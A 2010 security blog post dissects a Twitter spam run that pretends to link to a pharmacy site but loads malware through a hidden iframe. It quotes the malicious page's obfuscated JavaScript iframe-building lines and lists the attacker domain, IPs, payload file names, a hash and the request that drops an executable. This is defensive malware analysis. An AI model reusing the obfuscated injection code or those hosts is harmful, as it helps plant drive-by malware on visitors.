Saturday, June 12, 2010

Twitter, Canadian Pharmacy, and Undetected Malware

In our post earlier this week, IRS Malware Notice of UnderReported Income, we had a footnote about a current Twitter and YouTube spam run. Our friend Graham Cluley has labeled one version we mentioned the "Busty Amber" spam. (Graham, we didn't know her name - where did you meet her?)

At the time we posted that article we were starting to explore another aspect of the Twitter spam campaign, which continues unabated today, according to the UAB Spam Data Mine. Clicking on the link in the spam is well-publicized as a means to reaching a Canadian pharmacy website, but secretly behind the covers, this spam is all about planting malware.

Let's explore one example from an email we dissected this morning.

As with the American Express , IRS, and Twitter spam, this spam campaign avoids Spam Blacklisting methods by using many thousands of uniquely created spam URLs. In the case of the email we are examining, it looked like this:



The link that claims to be going to "twitter.com" is actually a URL for http://technoline.ca/z.htm

Technoline.ca is in all likelihood a compromised webserver, since its been up since October 2008 "serving the greater Montreal and South Shore region."

When we visit the "z.htm" page, we find that we get a 3 second meta refresh to take us to Canadian pharmacy site "toldspeak.com", however we ALSO get an iframe that takes us to:

rubytune.ru port 8080 /index.php?pid=10

(Rubytune.ru is possibly fast flux. Its currently resolving at:
83.172.13.23
83.172.148.10
89.31.96.64
94.23.224.132
95.211.128.13
)


That site has some interesting Javascript lines, including these two:

Lya2m7t = 'b<5/Mi5f5r5a|m|eH>b'.replace(/[b5\|MH]/g, '');

Ekv9i7z55 = '<5i6f,r|a|m6e5 *s*r5c5=6A6p*p5l,e,t61,0,.*h,t|m,l,>,<,/5i6f*r5a6m6e6>*'.replace(/[\*56\|,]/g, '');

So, the first line is saying take the big long string, and remove the characters in the list: "/", "[", "b", "5", "|", "M", and "H".

If we do that, it leaves us with an iframe to: Notes10.pdf

Doing the same thing on the other line leaves us with an iframe: Applet10.html

Both of those pages are downloaded from the "rubytune.ru" port 8080 webserver.

Notes10.pdf is a malicious PDF, however of the 41 anti-virus products at VirusTotal, only ONE of them says so. Its MD5 is: 33a6f72d52c53c10dd3eb3a7148651f2. You can see its VirusTotal Report here.

Applet10.html is yet another puzzle. This one is a webpage that has the title "Bob's homepage" and tries to use an IE exploit to drop a couple jar files, including a 0010.jar from the (unreachable) site: 85.10.136.213, and a file called "NewGames.jar". The only part of it that I can make function right now is a call to the rubytune.ru site passing a GET of "welcome.php?id=9&pid=10&1=1".

When we do that call, it drops an .exe on the box. For simplicity I named the .exe "welcome.exe". VirusTotal does a bit better with that one. This VirusTotal report shows 7 of 41 detections.

I kicked off the "welcome.exe" in a VM, and what I can tell for sure is that it bluescreened my VM. More details later . . .

No comments:

Post a Comment